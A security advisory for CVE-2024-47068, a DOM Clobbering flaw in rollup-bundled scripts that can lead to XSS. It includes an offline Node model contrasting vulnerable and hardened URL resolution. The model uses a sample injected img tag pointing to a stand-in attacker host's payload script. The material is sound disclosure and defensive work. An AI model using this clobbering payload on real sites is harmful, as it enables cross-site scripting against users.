CVE-2024-47068: DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS
We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url, or that rely on plugins which emit and reference asset files from code, in cjs, umd or iife output format. In those formats rollup resolves import.meta.url at runtime through document.currentScript, and an attacker who can inject scriptless HTML (for example an img tag with an unsanitized name attribute) can clobber that lookup so that the bundle derives its script and asset URLs from an attacker-controlled element. The gadget can therefore lead to cross-site scripting (XSS) on pages where such attacker-controlled elements are present.
It is worth noting that we have identified similar issues in other popular bundlers such as Webpack (CVE-2024-43788), which may serve as a useful reference.
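The following is an added example, not code from rollup or from the advisory, that models the gadget offline in Node. It assumes a simplified form of the URL-resolution expression rollup emits for import.meta.url in cjs/umd/iife output (a document.currentScript lookup with a document.baseURI fallback, hardened in the fix by checking that the element is really a script), a hand-built stand-in for the browser's named-element lookup on document, and constructed hostnames (app.example, attacker.example) and function names (resolveUrlVulnerable, resolveUrlHardened, makeDocument, assetUrl):

```javascript
// Added example modelling the CVE-2024-47068 DOM Clobbering gadget.
// Everything below is constructed for illustration; the exact text rollup
// emits is an assumption, but the shape (currentScript.src || baseURI) is the
// gadget and the tagName check is the shape of the hardened variant.

// Only these elements are exposed as named properties on document, and
// HTMLDocument's [LegacyOverrideBuiltIns] lets them shadow built-in
// accessors such as document.currentScript.
const CLOBBERABLE = new Set(['IMG', 'FORM', 'IFRAME', 'EMBED', 'OBJECT']);

// Stand-in for the browser's named-element lookup on document: returns the
// first clobberable element in `html` whose name attribute equals `name`.
function namedElement(html, name) {
  const tagRe = /<(\w+)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tagName = m[1].toUpperCase();
    const attrs = m[2];
    const attr = (key) => {
      const a = new RegExp(`\\b${key}\\s*=\\s*"([^"]*)"`, 'i').exec(attrs);
      return a ? a[1] : null;
    };
    if (CLOBBERABLE.has(tagName) && attr('name') === name) {
      return { tagName, src: attr('src') || '' };
    }
  }
  return null;
}

// Fake document: `executingScript` is the genuine <script> element when the
// bundle runs synchronously; otherwise currentScript falls back to whatever
// named element the (attacker-influenced) markup exposes, i.e. the clobber.
function makeDocument(html, baseURI, executingScript = null) {
  return {
    baseURI,
    currentScript: executingScript || namedElement(html, 'currentScript'),
  };
}

// Resolution expression as emitted by vulnerable rollup (simplified).
function resolveUrlVulnerable(doc, chunkId) {
  return (doc.currentScript && doc.currentScript.src) ||
    new URL(chunkId, doc.baseURI).href;
}

// Hardened form: only trust the src of a real <script> element.
function resolveUrlHardened(doc, chunkId) {
  const cs = doc.currentScript;
  return (cs && cs.tagName.toUpperCase() === 'SCRIPT' && cs.src) ||
    new URL(chunkId, doc.baseURI).href;
}

// Typical sink in a bundled app: an asset (worker, chunk, script) URL built
// relative to import.meta.url and then loaded, e.g. new Worker(assetUrl(...)).
function assetUrl(doc, chunkId, asset, resolve = resolveUrlVulnerable) {
  return new URL(asset, resolve(doc, chunkId)).href;
}

// Constructed attacker-controlled, scriptless HTML (e.g. a rendered comment).
const attackerHtml =
  '<p>Nice post!</p><img name="currentScript" src="https://attacker.example/payload.js">';

const clobbered = makeDocument(attackerHtml, 'https://app.example/app/');
console.log(resolveUrlVulnerable(clobbered, 'bundle.js')); // attacker URL
console.log(resolveUrlHardened(clobbered, 'bundle.js'));   // app URL
console.log(assetUrl(clobbered, 'bundle.js', './worker.js')); // attacker-hosted worker
```

Run with node; the vulnerable resolver hands the attacker's img src to every downstream URL computation, while the hardened resolver ignores the clobbered element and falls back to document.baseURI. The same clobber is harmless when the bundle is executing synchronously from a real script tag, which is why the bug surfaces mainly in deferred, module or event-driven execution paths where document.currentScript would otherwise be null.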
References
- github.com/advisories/GHSA-gcx4-mw62-g8wm
- github.com/rollup/rollup
- github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts
- github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
- github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
- github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
- nvd.nist.gov/vuln/detail/CVE-2024-47068